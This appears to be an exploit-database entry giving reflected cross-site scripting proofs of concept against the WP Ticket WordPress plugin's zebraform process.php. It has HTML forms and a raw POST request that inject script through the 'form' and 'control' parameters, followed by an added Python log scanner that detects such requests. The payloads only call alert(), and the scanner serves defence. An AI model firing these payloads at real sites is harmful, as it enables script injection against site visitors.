## https://sploitus.com/exploit?id=WPEX-ID:E4B796FA-3215-43FF-A6AA-71F6E1DB25E5
Via `$_GET['form']`:

```html
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=</script><img src onerror=alert(/XSS-form/)>&control=upload" method="post" enctype="multipart/form-data">
    <input type="file" name="upload"/>
    <input type="submit" name="submit" value="Send">
</form>
```

Via `$_GET['control']`:

```html
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=f&control=</script><svg/onload=alert(/XSS-control/)>" method="post" enctype="multipart/form-data">
    <input type="file" name="</script><svg/onload=alert(/XSS-control/)>"/>
    <input type="submit" name="submit" value="Send">
</form>
```

```http
POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
Content-Length: 241
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------77916619616724262872902741074
Content-Disposition: form-data; name="upload"; filename="a.txt"
Content-Type: text/plain

Test

-----------------------------77916619616724262872902741074--
```
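
A log check for the two parameters used in the requests above, as an added example that is not part of the original advisory: it flags requests to `process.php` whose `form` or `control` value is not a plain identifier. The allow-list pattern, the combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path suffix and parameter names are taken from the requests on this page.
TARGET_SUFFIX = "/assets/ext/zebraform/process.php"
PARAMS = ("form", "control")
# Assumption: legitimate values are plain identifiers such as "f" or "upload".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-content/plugins/wp-ticket'
    '/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror='
    'alert(/XSS-form/)%3E&control=upload HTTP/1.1" 200 312',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "POST /wp-content/plugins/wp-ticket'
    '/assets/ext/zebraform/process.php?form=f&control=upload HTTP/1.1" 200 298',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 1543',
]

def suspicious_params(target):
    """Return {param: decoded value} for values that are not plain identifiers."""
    parts = urlsplit(target)
    if not parts.path.endswith(TARGET_SUFFIX):
        return {}
    # parse_qs percent-decodes values; blank values are kept and also flagged.
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in PARAMS:
        for value in query.get(name, []):
            if not SAFE_VALUE.fullmatch(value):
                hits[name] = value
    return hits

def scan(lines):
    """Yield (client_ip, method, hits) for each log line that trips the check."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            yield line.split(" ", 1)[0], m.group("method"), hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allow-list can be enforced in front of the endpoint (for example in a WAF rule) until the plugin is updated or removed.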